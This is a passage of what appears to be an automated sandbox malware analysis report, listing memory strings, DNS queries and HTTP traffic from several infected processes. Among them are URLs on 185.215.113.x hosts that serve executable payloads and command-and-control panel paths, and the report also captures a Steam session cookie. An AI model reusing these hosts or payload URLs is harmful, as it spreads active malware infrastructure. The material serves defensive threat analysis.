"*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A856000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F80B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.bet# equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3247966540.00000268302C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3247966540.00000268302C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3247966540.00000268302C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: m/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/reca`" equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ntent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: t https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: t https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=e1278a16b9320a04499a4d86; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35741Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 07:08:19 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3289304414.000015D2F1003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3243296579.000002682F962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3243296579.000002682F916000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 07:07:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w28vxge5HmriY5JKKQzDt9F5iQCvCp7wdZ%2F5N%2FMVd3cg2%2BOdfh2hp1h%2B8%2FQYxk7AZKnb37myOSzYh5KCR1S2zFa5tJFHDvmIafKXRDk9zChnBrF87Ataivb2TvGwf563R7Ddvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7820eb6c216c2c-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 07:08:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3YWY1zzJ18K%2BdL%2F5kRnKhVgSDi%2BOK%2F%2Fli7BiduDvg0ywzht1NYu8%2BTcB1vCFESfBvXsQmNJ%2FrfOsw%2F7RyhjPJWJWuyEgH8bJX1UkQW28QUNX8OMs%2B5yQQdDYZ8KYj%2FEWe%2BCdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7822915ac2e905-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 07:09:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TY7v6Ex77IwDDg1YNslNs2%2FospkYEu1A%2FRY8h8b3e%2B4rOLCOjQh9UOH%2BT8LVsTFQ4GrWx4kbi8HjNUDsQMkP%2FQ92tzzQPy6lcRmZCSY897%2BDFdpdGbMSNeoPa%2B7i52rLm3ScwA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7823be88da6c44-DFW
Source: ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001177000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: ee8d47a049.exe, 0000000C.00000003.3085730532.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: ee8d47a049.exe, 0000000C.00000003.3085730532.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/4
Source: ee8d47a049.exe, 0000000C.00000003.3085730532.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/D
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe6139ded
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exep
Source: ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeJU
Source: ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: ee8d47a049.exe, 0000000C.00000003.3086208554.00000000057F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeXU
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe$
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exeJ
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: ee8d47a049.exe, 0000000C.00000003.3085730532.0000000001109000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/x
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.000000000109E000.00000004.00000020.00020000.00000000.sdmp, 36c3130eac.exe, 0000000D.00000002.2997022588.000000000072E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, 36c3130eac.exe, 0000000D.00000002.2997022588.000000000078B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/E
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Y
Source: 36c3130eac.exe, 0000000D.00000002.2997022588.000000000078B000.00000004.00000020.00020000.00000000.sdmp, 36c3130eac.exe, 0000000D.00000002.2997022588.000000000074C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4H
Source: 36c3130eac.exe, 0000000D.00000002.2997022588.000000000078B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpD
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
Source: 36c3130eac.exe, 0000000D.00000002.2997022588.000000000078B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpM
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.0000000001115000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: 36c3130eac.exe, 0000000D.00000002.2997022588.000000000078B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpindows
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.00000000010F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpxKby
Source: 36c3130eac.exe, 0000000D.00000002.2997022588.0000000000773000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/15.113.43/ferences.SourceAumid
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000A.00000002.3448009967.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000A.00000002.3448009967.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(~
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/1~
Source: skotes.exe, 0000000A.00000002.3448009967.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php141001
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0.Verb
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
Source: skotes.exe, 0000000A.00000002.3448009967.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
Source: skotes.exe, 0000000A.00000002.3448009967.00000000011AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
